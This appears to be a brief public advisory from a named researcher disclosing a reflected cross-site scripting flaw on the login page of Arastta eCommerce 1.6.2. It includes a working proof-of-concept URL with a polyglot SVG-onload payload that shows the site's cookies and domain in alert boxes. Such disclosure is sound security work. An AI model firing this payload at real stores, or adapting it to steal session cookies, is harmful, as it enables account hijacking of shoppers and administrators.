=================================================

Synopsis:          Arastta 1.6.2 xss vulnerability 
Product:           Arastta eCommerce: Free Shopping Cart
Version:           1.6.2
Researcher:           Matt Landers
				     mattjoeland@gmail.com
				     twitter.com/matthewjland
				     https://mjlanders.org/
                                     
=================================================

The xss that I have found is actually right on the login page.

http://inserthostnamehere.com/index.php/login/"--!>GIF89a/*<svg/onload=alert(document.cookie)>*/=alert(document.domain)//;

Replace 'inserthostnamehere.com' with the server you would like to test.